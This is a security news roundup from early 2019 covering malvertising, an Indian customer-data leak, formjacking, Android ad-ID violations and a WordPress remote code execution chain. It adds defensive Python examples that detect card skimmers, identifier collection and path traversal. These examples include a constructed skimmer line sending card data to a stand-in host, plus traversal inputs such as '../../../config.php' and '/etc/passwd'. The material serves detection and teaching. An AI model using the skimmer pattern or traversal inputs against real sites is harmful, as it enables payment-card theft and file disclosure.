Application Security Weekly Review, Week 8 2019
A massive malvertising campaign targeting US users, Aadhaar data exposure of Indian LPG gas company clients, critical flaw in WordPress, and more.
It’s been an interesting week in the world of cybersecurity. In this review we have compiled a list of the most noteworthy cybersecurity headlines, including a massive malvertising campaign targeting US users, the Aadhaar data exposure of the Indian company Indane's clients, a critical flaw in WordPress, and more.
Massive malvertising campaign hit US users over Presidents' Day weekend
Over Presidents' Day weekend researchers at the cyber-security firm Confiant uncovered a massive malvertising campaign aimed at US residents. In only three days Confiant recorded nearly 800 million malicious ad impressions delivered as part of the campaign. When clicked, the ads would redirect users to a wide variety of malicious sites, and unlike similar malware-oriented operations, this one’s goal was to steal users' personal and financial information by tricking them into entering those details into order forms for various fake products. The crooks would later sell the collected data or use it in other fraudulent operations.
According to the researchers, the group, which they named eGobbler, has been active for months but ramped up its efforts over the holiday, counting on the campaign being more successful at a time when ad operations teams are offline or less available to deal with security issues.
Official website of Indian state-owned LPG gas company Indane leaked personal details of 6.7 million customers
The official website of the Indian LPG gas company Indane has been leaking personal information of its clients, including their Aadhaar numbers. The vulnerability, which stems from a lack of authentication on the Indane online dealers portal, could allow any unauthenticated user to gain access to hundreds of thousands of customers' records, including their names, addresses and Aadhaar numbers.
The issue was initially discovered by an anonymous Indian researcher, who shared his findings with French security researcher Baptiste Robert (aka "Elliot Alderson"). During his own analysis, Robert discovered another vulnerability, in the Indane mobile app, which let him obtain dealer usernames. According to the researcher, attackers with knowledge of dealer usernames could steal the data of millions of Indian citizens from the Indane website.
Robert informed Indane about the issue, but the company did not acknowledge his report. Indane's owner, Indian Oil Corp Ltd., denied the data leak, stating that the Indane website does not store Aadhaar numbers.
Formjacking becomes a quick and easy way for cybercriminals to get rich
With profits from ransomware and cryptojacking declining, cybercriminals are increasingly turning to alternative methods such as formjacking. The attack method is simple: criminals insert malicious code into retailers' websites and steal customers' payment card data. According to Symantec's Internet Security Threat Report, every month during 2018 threat actors compromised more than 4,800 websites, injecting JavaScript code that steals payment information, such as debit and credit card details, from customers of e-commerce sites.
Considering that each stolen card can fetch up to $45 on underground markets, ten stolen cards from each compromised website could bring the hackers roughly $2.2 million per month.
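A formjacking skimmer has to do two things a defender can look for: read the payment fields and ship their contents to a host the merchant does not control. The following is an added example, not code from Symantec or from the original article. It is a small Python checker that parses a checkout page, flags external scripts from unexpected hosts or without a Subresource Integrity pin, forms posting to foreign origins, and inline scripts that reference card fields while naming an outside host. It also shows how to compute the SRI digest used to pin a known-good script. The host names, the sample pages and the `report(...)` call inside the injected snippet are constructed for the demonstration.

```python
"""Scan a checkout page for formjacking indicators (added example, constructed input)."""
import base64
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field names a skimmer has to touch to get card data; used only to rank inline scripts.
PAYMENT_FIELD_RE = re.compile(r"\b(card[_-]?number|cvv|cvc|expir\w*|pan)\b", re.I)
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+")


class PageScanner(HTMLParser):
    """Collects external script sources, form actions and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.script_srcs = []      # (src, integrity attribute or None)
        self.form_actions = []
        self.inline_scripts = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            if a.get("src"):
                self.script_srcs.append((a["src"], a.get("integrity")))
            else:
                self._in_script, self._buf = True, []
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline_scripts.append("".join(self._buf))
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


def host_of(url):
    """Hostname of an absolute URL, or None for relative references."""
    return urlparse(url).hostname


def sri_digest(script_text):
    """Subresource Integrity value that pins a known-good external script."""
    digest = hashlib.sha384(script_text.encode("utf-8")).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")


def scan_page(html, allowed_hosts):
    """Return human-readable findings; an empty list means no indicator fired."""
    findings = []
    p = PageScanner()
    p.feed(html)
    for src, integrity in p.script_srcs:
        host = host_of(src)
        if host and host not in allowed_hosts:
            findings.append(f"external script from unexpected host: {host}")
        elif host and integrity is None:
            findings.append(f"external script without SRI pin: {src}")
    for action in p.form_actions:
        host = host_of(action)
        if host and host not in allowed_hosts:
            findings.append(f"form posts to foreign origin: {host}")
    for script in p.inline_scripts:
        if not PAYMENT_FIELD_RE.search(script):
            continue
        for host in sorted({host_of(u) for u in URL_RE.findall(script)}):
            if host not in allowed_hosts:
                findings.append(f"inline script reads payment fields and contacts {host}")
    return findings


# Constructed sample pages (not real merchant markup); the integrity value is a placeholder.
CLEAN_PAGE = """<html><body>
<script src="https://cdn.shop.example/checkout.js" integrity="sha384-PLACEHOLDER"></script>
<form action="/checkout" method="post">
  <input name="card_number"><input name="cvv"><button>Pay</button>
</form></body></html>"""

COMPROMISED_PAGE = CLEAN_PAGE.replace("</body>", """<script>
  // constructed stand-in for an injected skimmer: card fields plus a third-party host
  var f = document.forms[0];
  report('https://stats-collect.example/c', f.card_number.value + '|' + f.cvv.value);
</script></body>""")

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("compromised", COMPROMISED_PAGE)):
        print(name, scan_page(page, {"cdn.shop.example"}) or ["no indicators"])
```

Run against a saved copy of the live checkout page on a schedule and alert on any new finding; an allowlist of first-party and payment-provider hosts plus SRI pins on every external script turns a silent injection into a detectable change.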
18,000+ Android apps violate Google's ad ID policies
More than 18,000 Android apps violate Google Play’s advertising identifier (ad ID) policies and users’ privacy, according to a report from the mobile privacy research group AppCensus. The researchers found that the apps in question, which should only collect a phone's "advertising ID" as a means of serving targeted ads, also collect persistent device identifiers, including serial numbers, IMEI, Wi-Fi MAC addresses and SIM card serial numbers, which (unlike the advertising ID) cannot be erased. As a result, the apps can still identify a user's device even if its owner resets the advertising ID.
Google’s policy forbids connecting the advertising identifier to personally identifiable information or associating it with any persistent device identifier, but in practice thousands of applications do not comply. According to AppCensus, more than 18,000 Android apps currently violate Google Play’s ad ID policy, including some highly popular applications with hundreds of millions of downloads and, in some cases, over 1 billion downloads.
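The policy rule above can be checked mechanically on a decompiled app: list which persistent-identifier APIs the code calls and whether the advertising ID is collected next to them. The following is an added example, not AppCensus's tooling or anything from the original article. It is a Python triage script over decompiled Java sources; the Android and Google Play services API names it matches (`getDeviceId`, `getImei`, `Build.SERIAL`, `getMacAddress`, `getSimSerialNumber`, `AdvertisingIdClient.getAdvertisingIdInfo`) are real, while the source files, package names and the `send(...)` helper in them are constructed.

```python
"""Triage decompiled Android sources for persistent identifier collection (added example)."""
import re

# Identifier classes named in the AppCensus findings, mapped to the Android APIs that
# return them. The API names are real; the source files scanned below are constructed.
PERSISTENT_ID_APIS = {
    "IMEI/MEID": [r"\.getDeviceId\s*\(", r"\.getImei\s*\(", r"\.getMeid\s*\("],
    "hardware serial": [r"\bBuild\.SERIAL\b", r"\bBuild\.getSerial\s*\("],
    "Wi-Fi MAC": [r"\.getMacAddress\s*\("],
    "SIM serial": [r"\.getSimSerialNumber\s*\("],
}
# The resettable identifier the policy expects ad SDKs to use (Google Play services API).
AD_ID_APIS = [r"AdvertisingIdClient\.getAdvertisingIdInfo\s*\(", r"AdvertisingIdClient\.Info\b"]


def scan_sources(sources):
    """sources: {path: java_text}. Returns ({path: [identifier classes]}, uses_ad_id)."""
    per_file = {}
    uses_ad_id = False
    for path, text in sources.items():
        hits = sorted(name for name, pats in PERSISTENT_ID_APIS.items()
                      if any(re.search(p, text) for p in pats))
        if hits:
            per_file[path] = hits
        if any(re.search(p, text) for p in AD_ID_APIS):
            uses_ad_id = True
    return per_file, uses_ad_id


def policy_verdict(per_file, uses_ad_id):
    """Apply the rule from the text: the ad ID must never sit next to a persistent identifier."""
    persistent = sorted({h for hits in per_file.values() for h in hits})
    if uses_ad_id and persistent:
        return "VIOLATION: ad ID collected alongside " + ", ".join(persistent)
    if persistent:
        return "REVIEW: persistent identifiers collected without ad ID: " + ", ".join(persistent)
    return "OK: only the resettable advertising ID" if uses_ad_id else "OK: no tracking identifiers"


# Constructed decompiled sources standing in for the output of a decompiler such as jadx.
SAMPLE_SOURCES = {
    "com/example/ads/Tracker.java": """
        String adId = AdvertisingIdClient.getAdvertisingIdInfo(ctx).getId();
        TelephonyManager tm = (TelephonyManager) ctx.getSystemService(Context.TELEPHONY_SERVICE);
        String imei = tm.getDeviceId();
        String serial = Build.SERIAL;
        String mac = wifi.getConnectionInfo().getMacAddress();
        send(adId, imei, serial, mac);   // hypothetical upload helper
    """,
    "com/example/ui/MainActivity.java": """
        setContentView(R.layout.main);
    """,
}

COMPLIANT_SOURCES = {
    "com/example/ads/Tracker.java": """
        String adId = AdvertisingIdClient.getAdvertisingIdInfo(ctx).getId();
        send(adId);   // hypothetical upload helper
    """,
}

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_SOURCES), ("compliant", COMPLIANT_SOURCES)):
        per_file, ad = scan_sources(src)
        print(label, per_file, policy_verdict(per_file, ad))
```

The scan is a static heuristic: a hit means the identifier is reachable from the code, not that it is sent anywhere, so findings are a starting point for manual review of where the values flow, and reflection or obfuscated SDKs will need dynamic confirmation.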
Critical vulnerability in WordPress could allow complete website takeover
Security experts found a critical remote code execution vulnerability in WordPress that had remained undiscovered for 6 years. The flaw affects all WordPress versions, including the latest version 5.0.3, and could be exploited for a full remote website takeover.
The attack relies on the way the WordPress image management system handles Post Meta entries, which store information such as the description, size, creator and other metadata of uploaded images. Successful exploitation requires the attacker to have access to an account with at least 'author' privileges on the target WordPress site. The attacker could then chain two separate vulnerabilities in WordPress core (a Path Traversal and a Local File Inclusion) to execute arbitrary PHP code on the underlying server.
The WordPress team blocked this exploitation route in WordPress versions 5.0.1 and 4.9.9 with a patch that made it impossible for unauthorized users to set arbitrary Post Meta entries. However, the Path Traversal issue itself remains unpatched and can still be exploited if the site has third-party plugins installed that incorrectly handle post metadata.
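The residual risk described above lives in plugin code that takes a stored metadata value and turns it into a file path. The check such code needs is the same in any language: canonicalise the value, confirm it stays inside the uploads directory, and restrict what kind of file may be referenced at all. The following is an added example, written in Python as a language-neutral illustration rather than WordPress or PHP code, and it is not part of the WordPress patch or the original article. The base directory `/srv/wp-uploads`, the sample metadata values and the `ALLOWED_SUFFIXES` set are assumptions for the demonstration.

```python
"""Contain a stored file name to the uploads directory before any file operation (added example)."""
from pathlib import Path, PurePosixPath
from urllib.parse import unquote


class UnsafePath(ValueError):
    """Raised when a stored name would escape the base directory or name a non-image."""


# Suffixes an image metadata entry may legitimately point at; anything else
# (.php above all) must never be resolved, let alone included.
ALLOWED_SUFFIXES = {".jpg", ".jpeg", ".png", ".gif"}


def safe_upload_path(base_dir, stored_name):
    """Return the absolute path for stored_name under base_dir, or raise UnsafePath."""
    if unquote(stored_name) != stored_name:  # percent-encoded traversal such as ..%2F
        raise UnsafePath("percent-encoded characters in stored name")
    if "\x00" in stored_name:
        raise UnsafePath("NUL byte in stored name")
    rel = PurePosixPath(stored_name.replace("\\", "/"))  # treat backslashes as separators too
    if rel.is_absolute() or ".." in rel.parts:
        raise UnsafePath("absolute path or parent reference in stored name")
    if rel.suffix.lower() not in ALLOWED_SUFFIXES:
        raise UnsafePath(f"disallowed file type: {rel.suffix or '(none)'}")
    base = Path(base_dir).resolve()
    target = (base / rel).resolve()  # collapses symlinks and any remaining oddities
    if base not in target.parents:   # containment check after canonicalisation
        raise UnsafePath("resolved path escapes the uploads directory")
    return target


def is_safe(base_dir, stored_name):
    """Boolean wrapper for bulk checks over existing metadata rows."""
    try:
        safe_upload_path(base_dir, stored_name)
        return True
    except UnsafePath:
        return False


# Constructed metadata values (hypothetical rows, not real site data).
SAMPLE_VALUES = [
    "2019/02/photo.jpg",
    "../../../config.php",
    "2019/02/..%2F..%2F..%2Fconfig.php",
    "2019/02/upload.php",
    "2019/02/photo.jpg\x00.php",
    "/etc/passwd",
]

if __name__ == "__main__":
    for value in SAMPLE_VALUES:
        print(repr(value), "->", "accepted" if is_safe("/srv/wp-uploads", value) else "rejected")
```

The order of the checks matters: the encoding and NUL tests run on the raw string before any path library normalises it away, the suffix test runs before resolution so that an include of a `.php` file is refused regardless of where it sits, and the containment test runs last on the canonical path so a symlink inside the uploads tree cannot point the operation outside it. The same wrapper can be run over existing metadata rows to find values that were written before the patch.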